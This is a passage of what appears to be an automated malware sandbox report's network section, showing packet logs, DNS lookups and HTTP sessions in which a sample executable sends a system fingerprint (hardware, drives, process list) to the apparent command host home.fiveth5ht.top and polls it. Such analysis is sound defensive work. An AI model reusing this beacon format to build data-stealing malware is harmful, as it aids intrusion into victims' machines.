                                    Dec 27, 2024 08:47:50.001178980 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001188040 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001261950 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001292944 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001374006 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001465082 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001507044 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001516104 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001605988 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001642942 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001714945 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001724005 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001759052 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001842976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001878977 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001910925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.001975060 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002023935 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002125025 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002134085 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002218008 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002269983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002307892 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002326012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.002402067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.117984056 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118163109 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118172884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118299007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118309975 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118357897 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.118493080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119055986 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.119152069 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.119343996 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119610071 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119621992 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119661093 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119669914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119786024 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119796038 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.119885921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120059013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120069027 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120141983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120224953 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120234013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120445013 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120455027 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120465994 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120476007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120565891 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120574951 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120697975 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120708942 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120795012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120804071 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120937109 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.120949984 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121162891 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121172905 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121258974 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121267080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121321917 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121330976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121442080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121450901 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121575117 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121584892 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121701002 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121710062 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121818066 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.121828079 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122020006 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122030020 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122039080 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122179985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122189999 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122199059 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122251034 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122261047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122337103 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122428894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122438908 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122585058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122594118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122603893 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.122893095 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.123133898 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.123209000 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.238722086 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238735914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238821983 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238831997 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238905907 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.238915920 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239043951 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239053965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239121914 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239132881 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239308119 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239337921 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239389896 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239398956 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239466906 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239475965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239629030 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239639997 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239650965 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239756107 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239767075 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239778996 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239851952 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239861012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239938021 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.239948034 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240073919 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240082979 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240165949 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240175009 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240252972 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240262032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240390062 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240398884 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240509033 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240519047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240530968 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240540028 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240621090 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240629911 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240720987 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240730047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240852118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240860939 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240951061 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.240962029 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241023064 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241030931 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241147995 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241158962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241168022 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241245985 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.241255045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242324114 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242712021 CET4971080192.168.2.115.101.3.217
                                    Dec 27, 2024 08:47:50.242778063 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242851973 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242909908 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.242921114 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243004084 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243012905 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243099928 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243108988 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243221045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243230104 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243359089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243369102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243421078 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243429899 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243552923 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243563890 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243663073 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243671894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243735075 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243745089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243818045 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243827105 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243923903 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.243932962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244019032 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244030952 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244110107 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244118929 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244204998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244214058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244290113 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244301081 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244487047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244498968 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244508028 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244607925 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244618893 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244628906 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244898081 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244906902 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244915962 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244925976 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244935036 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.244945049 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245157003 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245165110 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245174885 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245183945 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245193005 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245203018 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245212078 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245222092 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245341063 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.245357990 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362673998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362689018 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362782001 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362792015 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362895012 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.362903118 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363053083 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363063097 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363207102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363215923 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363332033 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363342047 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363488913 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363497019 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363619089 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363626957 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363743067 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363751888 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363922119 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.363931894 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364006042 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364015102 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364110947 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364120007 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364231110 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364240885 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364331961 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364464998 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364474058 CET80497105.101.3.217192.168.2.11
                                    Dec 27, 2024 08:47:50.364485979 CET80497105.101.3.217192.168.2.11
Dec 27, 2024 08:47:50.364648104 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:50.364659071 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:50.364768982 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:50.364777088 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:50.370323896 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:52.431143045 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:52.431356907 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:52.431401968 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:52.431512117 CET | 49710 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:52.550992966 CET | 80 | 49710 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:52.665671110 CET | 49721 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:52.785166025 CET | 80 | 49721 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:52.785346031 CET | 49721 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:52.785656929 CET | 49721 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:52.905077934 CET | 80 | 49721 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:54.305116892 CET | 80 | 49721 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:54.305198908 CET | 80 | 49721 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:54.305248976 CET | 49721 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:54.305583000 CET | 49721 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:54.425050020 CET | 80 | 49721 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:54.514311075 CET | 49727 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:54.633933067 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:54.634314060 CET | 49727 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:54.635361910 CET | 49727 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:54.754952908 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:56.204541922 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:56.204641104 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.11
Dec 27, 2024 08:47:56.204713106 CET | 49727 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:56.205023050 CET | 49727 | 80 | 192.168.2.11 | 5.101.3.217
Dec 27, 2024 08:47:56.324414015 CET | 80 | 49727 | 5.101.3.217 | 192.168.2.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 27, 2024 08:47:44.176150084 CET | 56204 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:44.176246881 CET | 56204 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:44.328953981 CET | 53 | 56204 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:44.475444078 CET | 53 | 56204 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:48.442183018 CET | 54957 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:48.442255974 CET | 54957 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:48.583337069 CET | 53 | 54957 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:48.583523035 CET | 53 | 54957 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:52.527261972 CET | 54959 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:52.527326107 CET | 54959 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:52.664468050 CET | 53 | 54959 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:52.664486885 CET | 53 | 54959 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:54.372951984 CET | 54961 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:54.373084068 CET | 54961 | 53 | 192.168.2.11 | 1.1.1.1
Dec 27, 2024 08:47:54.509681940 CET | 53 | 54961 | 1.1.1.1 | 192.168.2.11
Dec 27, 2024 08:47:54.510354042 CET | 53 | 54961 | 1.1.1.1 | 192.168.2.11
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 27, 2024 08:47:44.176150084 CET | 192.168.2.11 | 1.1.1.1 | 0x9aa6 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:44.176246881 CET | 192.168.2.11 | 1.1.1.1 | 0xf37b | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 27, 2024 08:47:48.442183018 CET | 192.168.2.11 | 1.1.1.1 | 0x23f8 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:48.442255974 CET | 192.168.2.11 | 1.1.1.1 | 0xce91 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 08:47:52.527261972 CET | 192.168.2.11 | 1.1.1.1 | 0x99a6 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:52.527326107 CET | 192.168.2.11 | 1.1.1.1 | 0x396a | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Dec 27, 2024 08:47:54.372951984 CET | 192.168.2.11 | 1.1.1.1 | 0x9e68 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:54.373084068 CET | 192.168.2.11 | 1.1.1.1 | 0xb932 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 27, 2024 08:47:44.475444078 CET | 1.1.1.1 | 192.168.2.11 | 0x9aa6 | No error (0) | httpbin.org |  | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:44.475444078 CET | 1.1.1.1 | 192.168.2.11 | 0x9aa6 | No error (0) | httpbin.org |  | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:48.583523035 CET | 1.1.1.1 | 192.168.2.11 | 0x23f8 | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:52.664468050 CET | 1.1.1.1 | 192.168.2.11 | 0x99a6 | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
Dec 27, 2024 08:47:54.509681940 CET | 1.1.1.1 | 192.168.2.11 | 0x9e68 | No error (0) | home.fiveth5ht.top |  | 5.101.3.217 | A (IP address) | IN (0x0001) | false
                                    • httpbin.org
                                    • home.fiveth5ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.11 | 49710 | 5.101.3.217 | 80 | 2028 | C:\Users\user\Desktop\xXe4fTmV2h.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 08:47:48.713882923 CET | 12360 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 500771
                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "8467331788743531425", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 744 }, { "name": "fontdrvhost.exe", "pid": 764 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": 856 }, { "name": "svchost.exe", "pid": 916 }, { "name": "dwm.exe", "pid": 980 }, { "name": "svchost.exe", "pid": 352 }, { "name": "svchost.exe", "pid": 476 }, { "name": "svchost.exe", "pid": 660 }, { "name": "svchost.exe" [TRUNCATED]
Dec 27, 2024 08:47:52.431143045 CET | 157 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:52 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 1
                                    Connection: close
                                    Data Raw: 30
                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.11 | 49721 | 5.101.3.217 | 80 | 2028 | C:\Users\user\Desktop\xXe4fTmV2h.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 08:47:52.785656929 CET | 98 | OUT | GET /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
Dec 27, 2024 08:47:54.305116892 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
                                    Server: nginx/1.22.1
                                    Date: Fri, 27 Dec 2024 07:47:54 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Content-Length: 207
                                    Connection: close
                                    Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.11 | 49727 | 5.101.3.217 | 80 | 2028 | C:\Users\user\Desktop\xXe4fTmV2h.exe
Timestamp | Bytes transferred | Direction | Data
Dec 27, 2024 08:47:54.635361910 CET | 171 | OUT | POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                    Host: home.fiveth5ht.top
                                    Accept: */*
                                    Content-Type: application/json
                                    Content-Length: 31
